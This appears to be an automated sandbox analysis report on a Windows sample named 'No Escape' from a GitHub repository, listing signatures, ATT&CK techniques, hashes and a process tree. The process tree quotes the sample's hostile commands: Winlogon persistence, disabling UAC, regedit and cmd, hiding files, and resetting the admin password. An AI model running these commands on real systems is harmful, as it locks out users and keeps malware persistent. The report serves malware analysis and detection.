Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
39s -
max time network
41s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
16/03/2024, 05:26
Errors
General
-
Target
https://github.com/LocalAlloc/NO-ESCAPE
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
-
UAC bypass 3 TTPs 1 IoCs
-
Disables RegEdit via registry modification 1 IoCs
-
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Program Files directory 12 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 17 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs .reg file with regedit 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 42 IoCs
-
Suspicious use of FindShellTrayWindow 34 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/LocalAlloc/NO-ESCAPE1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb44f9758,0x7ffdb44f9768,0x7ffdb44f97782⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1652 --field-trial-handle=1904,i,457300053573337061,5554946905750874967,131072 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1904,i,457300053573337061,5554946905750874967,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2184 --field-trial-handle=1904,i,457300053573337061,5554946905750874967,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2984 --field-trial-handle=1904,i,457300053573337061,5554946905750874967,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2992 --field-trial-handle=1904,i,457300053573337061,5554946905750874967,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 --field-trial-handle=1904,i,457300053573337061,5554946905750874967,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 --field-trial-handle=1904,i,457300053573337061,5554946905750874967,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4968 --field-trial-handle=1904,i,457300053573337061,5554946905750874967,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5540 --field-trial-handle=1904,i,457300053573337061,5554946905750874967,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5508 --field-trial-handle=1904,i,457300053573337061,5554946905750874967,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5692 --field-trial-handle=1904,i,457300053573337061,5554946905750874967,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4972 --field-trial-handle=1904,i,457300053573337061,5554946905750874967,131072 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\No Escape.exe"C:\Users\Admin\Downloads\No Escape.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\wscript.exe"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\7177.tmp\7178.tmp\7179.vbs //Nologo3⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\hello.bat" "4⤵
-
C:\Windows\system32\attrib.exeattrib +s +h C:\msg.exe5⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\launch.exe5⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\regedit.exeregedit /s hello.reg5⤵
- Runs .reg file with regedit
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System /v DisableLogonBackgroundImage /t REG_DWORD /d 15⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d C:\Windows\system32\userinit.exe,C:\launch.exe /f5⤵
- Modifies WinLogon for persistence
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\control panel\desktop" /v wallpaper /t REG_SZ /d C:\hello.jpg /f5⤵
- Sets desktop wallpaper using registry
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 15⤵
-
-
C:\Windows\system32\reg.exereg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 25⤵
-
-
C:\Windows\system32\reg.exeREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f5⤵
- Disables RegEdit via registry modification
- Modifies registry key
-
-
C:\Windows\system32\net.exenet user Admin death5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin death6⤵
-
-
-
C:\Windows\system32\shutdown.exeshutdown /t 0 /r5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa396f055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
120B
MD5255a8e245b6ad378558b90cbe3dbc3d0
SHA16eb73f9f2034c113a2a6b1aab9a440a21928cfc2
SHA256d3195bde888f9b8a71f2eb840222f1586b652d0ede9f39841a180ead03633ca9
SHA51267e03d7bffa0dec32535b6da46d5b7f38d94a7c9a231aa2fa625b81485d41c1ecac95b08fe5b7a605fcfe1c7e37c55ee716c9045df90ea6e030b86e52ec09edf
-
Filesize
1KB
MD5b86fddd2b764f079615be5d4dc3e158d
SHA12510479054db1fe52cc2dcd3c7033d91204cb367
SHA2562b2114784d15b0b0d5475256851b4d0d4da7181198c2a93a304ecedb98eaf091
SHA512915363bc9f6e665358c8d25f5f5f51d64c53cb755be999013217162b126705ce641ea809047bc84511db7e3e383b848ec3932924baa8926d51a51d0037a5ca63
-
Filesize
110KB
MD5057ea45c364eb2994808a47b118556a2
SHA11d48c9c15ea5548af1475b5a369a4f7b8db42858
SHA2566e1115188aa00fb5ff031899100bacb0d34819707e069bca3eb53935ebb39836
SHA512582c7ecf2d0c33c8706ff3f39aa926780aa8f0dc0ff5d563905a5100254b81b89def22206abee0871ab339a3d463de9e6ec1782d92198e8f386f173654b6e760
-
Filesize
3KB
MD581427e9d5d10657b9edffd22e7b405bb
SHA1f27ab62f77f827dbb32c66a35ac48006c47f4374
SHA256bb21001c1c468e6e372d836952c3efb7fbdc98e9a20a1bfdcc4beb1b7a1e7f83
SHA512b0ee65bcef13be7c17db6e06b96cd44774fcebe6f4a411b0073493ff53f795e3b7c49e921c3bd2e41256638bc161f5218d1c51b589c3e10164f8f2c0d1db1592
-
Filesize
92KB
MD5b4acc41d0e55b299ffeec11a8a20cf08
SHA1bbee20882bdd9dcd24b54b6af6c48cf5efc8c6fa
SHA25634bc0d5b6029a74b9cda56b72434ec1b55b6742ff5ef832d36027a987a63cd42
SHA512d4fa9900d703ea12d508929718433f97581a23b63458e5070ff7749871a7f60889db45098ec2972687b864ba97ab4fc307e8c80c4450dee79c0a5738818d2794
-
Filesize
9KB
MD5331a0667b11e02330357565427dc1175
SHA1d84c1ae0bf2c8ca1f433f0086ca86e07f61204c2
SHA256fc7174e44a1d34040c3bc05ce24e648742a38a3accce22e8300d7059e4d12431
SHA5121c47f0438dce58d473d93c10f233650df3e86d7e762a08b3a933da37683e76a079d275db4a1b4028d903f7e43f487173ba8bb25c4cff6f3e1161d0a5b2b18cec
-
Filesize
1KB
MD539942ce8e8b52c06c64f418715ca6946
SHA1c086980b1600d9f8659ed27171e38ff35927ae24
SHA2566bd62c1b4ed6692213d71904aa08ac0bb18a5fe452c123171d14158524ae9019
SHA51267a26a0d162fc11b7237944787c5a44572bab6293c4171cef2aaf23a6d1a26c65665ecb06e7e8f56dc5c85f9f2bd09e27828e7675db5e202517653f0de1abd9e
-
Filesize
1KB
MD599f1a9327513fef8b0e2d58ca564a76b
SHA11f523064e9f378effcf73e8b4dae28ad7db769b1
SHA2569b88d33f5a58532f2ba232e15505243873db4ce8ba482e9c52b179e3dab69c2e
SHA5122bc2c14f0861a1e8da113a12982b44cffe84e52224a74d6b1e979cc50172171732e0fabd3f4cdd326c6e52117d6890c0da26d94d63fd27d0191c92dd6240a088
-
Filesize
6KB
MD589ae4f121a12b82e27d55f585e7f7e98
SHA1736be010f6ba49e70819503e4c0aa4b53dccc5e2
SHA256a7f3753fd3a392ffc3e6b0b9a8486203115be720672932b2e9413a854e853727
SHA5123c49a87d20f7827610f703143ebcd44aecbaeb5f9e6ada64b5273beb1808a324d9103d7dc879f8e192611136cb5f9377276a88517b32523feb6765d17c3a44ca
-
Filesize
6KB
MD58f4c992c5f4daee5dc07e8f0e9fcf78c
SHA1b1cb7530e982fa2fc35460b91924f0f010255e64
SHA256f95d86115f5e62edb0711aafd015c9851816a2f350e544bae2a49c795b909c31
SHA512e51527f535b83cdfa7e1b5b1694b4d0bd9b4df73e5efdd7fdbcc4d3faabbd05d36a64b52caa17f1afb93d49eaf19e5b7ded15fe8e54b29e4a11c5e4be00a2d77
-
Filesize
128KB
MD55beae146458ce4f788762ea9201e33bb
SHA15dd0f6aca373e0a2ad9e6978fedba03ee014b0a0
SHA256b0658f1c3cac0206d578e8e692a2eae47a55cc5fd287411a9df77a26c6dbe718
SHA51254109b59c9f74c7aa0d63ecfba6ac7920b819d44a6c0ab67a352bcf10ae84ea901716cef5dd9c8ed5d35c0e6c788f896f5ddfab93d740f3d1af91cfa75074f5d
-
Filesize
128KB
MD59d9ac994143fac4830014ce42a1fb4b8
SHA176184db1ef9aee61fa966f01841bf01ce6c693bf
SHA2565c7824d5a8f309a247ed92e31e368bbae7df24643ce654a44fdd815e7b971ec2
SHA512b2fff6a1b94cad77018cb83c50b9feef675612739ec8cfbdbffda975e320e1ac01b01ca3295a3dbcc6ca9f8df96ba6f006c405581bcef8a9e936d8cda0b9fce2
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
588B
MD567706bca9ceaba11530e05d351487003
SHA13a5ed77f81b14093a5f18c4d46895bc7ea770fee
SHA256190a0d994512ed000cf74bd40fb0502988c2ac48855b23a73fd905c0305fc30f
SHA512902ac91678d85801a779acbc212c75beba72f8da996b0ed1b148a326c2dd635b88210f9a503fbbffa5271335483eae972e6a00acbc01ec013cf355c080444598
-
Filesize
771KB
MD52782877418b44509fd306fd9afe43e39
SHA1b0c18bdf782ca9c4fa41074f05458ce8e0f3961b
SHA25656d612e014504c96bb92429c31eb93f40938015d422b35765912ac4e6bd3755b
SHA5128826881b3ab406ee4c1fabd4848161f8524aeaeb7c4397384d36840f947ef95c8560850b2409fbf761ff225cdc8ac6eb875b705476fe9574b23c7a5478505a86
